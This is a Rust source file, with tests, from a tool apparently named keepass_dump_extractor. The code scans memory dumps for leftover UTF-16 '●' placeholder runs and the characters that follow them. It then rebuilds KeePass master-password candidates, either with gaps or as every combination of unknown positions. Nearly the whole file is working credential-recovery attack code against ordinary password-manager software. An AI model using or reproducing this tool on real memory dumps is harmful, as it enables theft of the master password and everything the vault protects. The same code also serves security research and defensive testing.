keepass_dump_extractor/
lib.rs1use itertools::Itertools;
2use once_cell::sync::Lazy;
3use std::collections::{HashMap, HashSet};
4
5use cli::Format;
6
7pub mod cli;
8
9const PREFIX: [u8; 2] = [0xCF, 0x25]; static VALID_CHARS: Lazy<HashSet<char>> = Lazy::new(|| {
12 let mut set = HashSet::new();
13 for range in [0x20..=0x7E, 0x0A0..=0x2AF, 0x1E00..=0x1EFF] {
14 set.extend(range.filter_map(char::from_u32));
15 }
16 set
17});
18static COMMON_CHARS: Lazy<Vec<char>> =
19 Lazy::new(|| (0x20..=0x7E).filter_map(char::from_u32).collect());
20
21pub fn find_leaks(bytes: &[u8]) -> Vec<(usize, char)> {
22 let mut results = Vec::new();
23 let mut length = 0;
24 let mut i = 0;
25 while i < bytes.len() - 1 {
26 if bytes[i..i + 2] == PREFIX {
28 length += 1;
29 i += 2;
30 continue;
31 } else if length > 0 {
32 if let Some(Ok(c)) =
34 char::decode_utf16([u16::from_le_bytes([bytes[i], bytes[i + 1]])]).next()
35 {
36 if VALID_CHARS.contains(&c) && bytes[i + 2..i + 4] == [0x00, 0x00] {
38 results.push((length, c));
39 i += 4;
40 continue;
41 }
42 }
43 }
44 length = 0;
45 i += 1;
46 }
47
48 results
49}
50
/// Buckets leaks by their length (the first tuple field).
///
/// Within each bucket the leaks keep the relative order they had in `leaks`.
fn group_by_length(leaks: Vec<(usize, char)>) -> HashMap<usize, Vec<(usize, char)>> {
    let empty: HashMap<usize, Vec<(usize, char)>> = HashMap::new();

    leaks.into_iter().fold(empty, |mut groups, leak| {
        groups.entry(leak.0).or_default().push(leak);
        groups
    })
}
59
/// Counts how many times each distinct `(length, character)` leak occurs.
///
/// Returns a map from leak to its number of occurrences in `leaks`; an empty
/// slice yields an empty map.
fn count_duplicates(leaks: &[(usize, char)]) -> HashMap<(usize, char), usize> {
    let mut counts = HashMap::new();
    for &leak in leaks {
        // One entry lookup both inserts the initial zero and bumps the counter.
        *counts.entry(leak).or_insert(0) += 1;
    }

    counts
}
69
70fn order_by_duplicates(leaks: &[(usize, char)]) -> Vec<(usize, char)> {
71 let map = count_duplicates(leaks);
72
73 let mut leaks = map.into_iter().collect::<Vec<_>>();
74 leaks.sort_by(|((a1, _), a2), ((b1, _), b2)| match a1.cmp(b1) {
75 std::cmp::Ordering::Equal => a2.cmp(b2).reverse(),
76 other => other,
77 });
78 leaks.into_iter().map(|(leak, _)| leak).collect()
79}
80
81fn get_unknowns_and_knowns(
82 leaks: Vec<(usize, char)>,
83 insert_common: bool,
84) -> (Vec<Vec<(usize, char)>>, Vec<char>) {
85 let leaks = order_by_duplicates(&leaks);
86 let leaks = group_by_length(leaks);
87 let max_length = *leaks.keys().max().unwrap() + 1;
88
89 let unknowns = (0..max_length)
90 .filter_map(|length| {
91 let chars = leaks.get(&length).cloned().unwrap_or_else(|| {
92 if insert_common {
93 COMMON_CHARS.iter().map(|&c| (length, c)).collect()
95 } else {
96 vec![]
97 }
98 });
99 (chars.len() > 1).then_some(chars)
100 })
101 .collect::<Vec<_>>();
102 let mut password = vec!['●'; max_length];
103 leaks.iter().for_each(|(length, chars)| {
104 if chars.len() == 1 {
105 password[*length] = chars.iter().next().unwrap().1;
106 }
107 });
108 (unknowns, password)
109}
110
111pub fn print_formatted_leaks(leaks: &[(usize, char)], format: cli::Format) {
112 match format {
113 Format::Found => {
115 let leaks = order_by_duplicates(leaks);
116
117 for (length, c) in leaks {
118 println!("{}{}", "●".repeat(length), c);
119 }
120 }
121 Format::Gaps => {
123 let (unknowns, password) = get_unknowns_and_knowns(leaks.to_vec(), false);
124
125 for unknown in unknowns {
126 for (length, c) in unknown {
127 let mut password = password.clone();
128 password[length] = c;
129 println!("{}", password.iter().collect::<String>());
130 }
131 }
132 }
133 Format::All => {
135 let (unknowns, mut password) = get_unknowns_and_knowns(leaks.to_vec(), true);
136
137 for perm in unknowns.iter().multi_cartesian_product() {
138 for (length, c) in perm {
139 password[*length] = *c;
141 }
142 println!("{}", password.iter().collect::<String>());
143 }
144 }
145 Format::Raw => {
147 let map = count_duplicates(leaks);
148 let mut leaks = map.into_iter().collect::<Vec<_>>();
149 leaks.sort_by(|((a1, _), _), ((b1, _), _)| a1.cmp(b1));
150
151 for ((length, c), count) in leaks {
152 println!("{count}\t{length}\t{c}");
153 }
154 }
155 }
156}
157
#[cfg(test)]
mod tests {
    use super::*;
    use hex_literal::hex;

    /// ASCII characters are reported together with the number of markers
    /// that precede them.
    #[test]
    fn simple_character() {
        // A lone marker followed by noise, then three markers in front of 'g'.
        let short_run = hex!("cf2500004141414141414141cf25cf25cf25670000004242424242424242");
        let found = find_leaks(&short_run);
        assert_eq!(found, vec![(3, 'g')]);

        // Twelve markers in front of 'A', ending exactly at the end of the input.
        let long_run = hex!("cf25cf25cf25cf25cf25cf25cf25cf25cf25cf25cf25cf2541000000");
        let found = find_leaks(&long_run);
        assert_eq!(found, vec![(12, 'A')]);
    }

    /// Characters outside ASCII but inside the accepted ranges are reported too.
    #[test]
    fn non_ascii_character() {
        // Four markers in front of U+0153.
        let dump = hex!("cf25cf25cf25cf2553010000");
        let found = find_leaks(&dump);

        assert_eq!(found, vec![(4, 'œ')]);
    }
}